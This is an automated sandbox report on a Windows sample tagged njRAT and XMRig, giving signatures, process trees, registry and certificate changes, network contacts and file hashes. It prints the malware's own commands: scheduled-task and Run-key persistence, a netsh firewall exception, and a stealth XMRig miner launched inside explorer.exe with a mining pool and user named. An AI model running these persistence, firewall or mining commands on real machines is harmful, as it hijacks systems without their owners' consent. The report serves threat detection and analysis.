Malware Analysis Report

2025-03-15 06:26

Sample ID 240122-nch7vsehfm
Target 6f8798f01a7ec11429f624dbc59b4a32
SHA256 580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844
Tags
njrat xmrig hacked evasion miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844

Threat Level: Known bad

The file 6f8798f01a7ec11429f624dbc59b4a32 was found to be: Known bad.

Malicious Activity Summary

njrat xmrig hacked evasion miner persistence trojan

njRAT/Bladabindi

xmrig

XMRig Miner payload

Modifies Windows Firewall

Drops startup file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies system certificate store

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-22 11:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-22 11:15

Reported

2024-01-22 11:17

Platform

win7-20231215-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

Signatures

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2240 set thread context of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\services32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

C:\Users\Admin\AppData\Local\Temp\lear.exe

"C:\Users\Admin\AppData\Local\Temp\lear.exe"

C:\Users\Admin\AppData\Local\Temp\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Users\Admin\AppData\Local\Temp\services32.exe

"C:\Users\Admin\AppData\Local\Temp\services32.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 prohashing.com udp
US 104.21.10.32:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 172.67.189.225:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 172.67.189.225:3359 prohashing.com tcp

Files

memory/1044-0-0x0000000000380000-0x0000000000698000-memory.dmp

memory/1044-1-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

memory/1044-2-0x000000001B100000-0x000000001B180000-memory.dmp

memory/1044-3-0x000000001B100000-0x000000001B180000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 d96ee436f67f495f2c0fe0b9d815d259
SHA1 2a91f603706ac85ca1df067d164584ff02dcbc1b
SHA256 a0a5ac4d1ed0de20cbc822cc9bf8dedbac892675e89da757029bf73e53ae90d3
SHA512 59649844315f3ab0eae546d759f786d63e4597d2b412d2d594e8af90939b00e0ba83b79ffb1a8173a0f3f4222dfa85b2226431413de5285f92944eaad90d1b09

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 26df047471cff53f66190d535b2d73f8
SHA1 ea2483f3323bbbe0b959f409e24cfd514a662ae1
SHA256 68548c3b3730d33e005aef791d19ad382048cadce98051ac891b04265cacc4cf
SHA512 8328178254aa1cbd848d8fc0dcf45daef8e156f55a88c38b56ffa6105b2eb7dd1886a6fefcc5631f385446030500feb2963cd2b077c88649b1fdaefc337d2153

C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5 696f2e0facba8c9bc7e2269986bada95
SHA1 aaa3ce178ba47c0e370c3ca40b99654cf61d99dd
SHA256 de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a
SHA512 afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb

C:\Users\Admin\AppData\Local\Temp\lear.exe

MD5 97daf8fe1ab31512c47821ea389434f4
SHA1 0db20bdf1704d44af9fe9e5e882fe455c2b9f19f
SHA256 a2710f1b04f006151c264ece03e7ea14f6e0066f4af4166da0220b75af413a34
SHA512 35f596628e9793959d280f8309d5aaef264813753d414fca5a38dcdce7b817859d662e210f591d974585dfcb77a2aca406a6710e446876dad47a97295a58e202

memory/1044-18-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

MD5 7d97ebd020adc594094c05b1aa04bc9c
SHA1 2522f47426b2fb9456d0895c26017addeab13b65
SHA256 9ee54245dca5e903968f92a6411375a7c89fb2085a92ac03d3198feffe610c97
SHA512 87d9127610d2aa5beb0dfa92e1523034be2d455ffedb9a11f3debf98801292fe372351b23049bbe683e27cffe686ba4dac1eb728bff7850bacbb4a04454630bc

memory/2816-29-0x0000000074700000-0x0000000074CAB000-memory.dmp

memory/2784-31-0x000000013F080000-0x000000013F674000-memory.dmp

memory/2816-32-0x0000000002110000-0x0000000002150000-memory.dmp

memory/2656-34-0x00000000037C0000-0x0000000003DB4000-memory.dmp

memory/2784-35-0x000000013F080000-0x000000013F674000-memory.dmp

\??\c:\users\admin\appdata\local\temp\rarsfx0\1_protected.exe

MD5 6369fc45d88a6a4ac494378f82c0646b
SHA1 d034443895d58921619959e14234620b7f169170
